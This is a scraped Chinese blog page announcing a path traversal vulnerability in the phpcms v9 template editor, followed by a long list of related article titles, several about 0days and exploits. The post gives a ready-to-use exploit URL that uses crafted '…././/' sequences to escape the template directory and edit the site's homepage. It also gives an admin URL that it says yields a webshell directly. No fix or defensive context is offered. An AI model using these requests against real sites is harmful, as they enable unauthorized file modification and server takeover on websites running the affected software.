当前位置: 首页 > news >正文

phpcms v9模版编辑路径穿越漏洞

by flyh4t

通过如下方式可穿越目录编辑首页

index.php?m=template&c=file&a=edit_file&style=default&dir=wap/…././/…././/…././/…././/&file=index.html&pc_hash=YHgoqn


admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php 这个页面可以直接getshell

相关文章:

  • 越狱的 iPhone、iPad 通过网站实现一键安装 ipa 格式的 APP 应用
  • 最新Java 0day漏洞分析及EXP下载
  • MYSQL 外链设置语句
  • MySQL安全配置详解
  • Netcms oday 漏洞
  • Asp.net的登录验证方法Web.config访问权限配置
  • 放入conn.asp中(拒绝攻击 万能Asp防注入代码)
  • phpcms后台普通用户读文件0day及修复
  • Kesion cms 路径泄露漏洞
  • asp中容错语句的使用
  • 防止SQL注入
  • 解决ASP防SQL注入攻击程序问题
  • Discuz7.X通杀0day(UCenter Home-2.0) poc
  • Kracker路由器破解工具
  • 代码之美 - 如何写出优雅的PHP代码
  • 4个实用的微服务测试策略
  • C++类的相互关联
  • CoolViewPager:即刻刷新,自定义边缘效果颜色,双向自动循环,内置垂直切换效果,想要的都在这里...
  • isset在php5.6-和php7.0+的一些差异
  • java2019面试题北京
  • Java程序员幽默爆笑锦集
  • JS创建对象模式及其对象原型链探究(一):Object模式
  • Lucene解析 - 基本概念
  • Python实现BT种子转化为磁力链接【实战】
  • RedisSerializer之JdkSerializationRedisSerializer分析
  • 大快搜索数据爬虫技术实例安装教学篇
  • 免费小说阅读小程序
  • 我从编程教室毕业
  • 消息队列系列二(IOT中消息队列的应用)
  • 小程序button引导用户授权
  • 要让cordova项目适配iphoneX + ios11.4,总共要几步?三步
  • 一天一个设计模式之JS实现——适配器模式
  • (4)logging(日志模块)
  • (Git) gitignore基础使用
  • (大众金融)SQL server面试题(1)-总销售量最少的3个型号的车及其总销售量
  • (附源码)node.js知识分享网站 毕业设计 202038
  • (附源码)springboot猪场管理系统 毕业设计 160901
  • (附源码)ssm基于web技术的医务志愿者管理系统 毕业设计 100910
  • ***通过什么方式***网吧
  • . ./ bash dash source 这五种执行shell脚本方式 区别
  • .NET Windows:删除文件夹后立即判断,有可能依然存在
  • .net 打包工具_pyinstaller打包的exe太大?你需要站在巨人的肩膀上-VC++才是王道
  • .NET连接数据库方式
  • .ui文件相关
  • @31省区市高考时间表来了,祝考试成功
  • @JoinTable会自动删除关联表的数据
  • @Transactional 竟也能解决分布式事务?
  • [20150321]索引空块的问题.txt
  • [2016.7 Day.4] T1 游戏 [正解:二分图 偏解:奇葩贪心+模拟?(不知如何称呼不过居然比std还快)]
  • [20170705]diff比较执行结果的内容.txt
  • [ABC294Ex] K-Coloring
  • [C/C++]_[初级]_[关于编译时出现有符号-无符号不匹配的警告-sizeof使用注意事项]
  • [Codeforces] combinatorics (R1600) Part.2
  • [HDU]2161Primes
  • [javaSE] GUI(事件监听机制)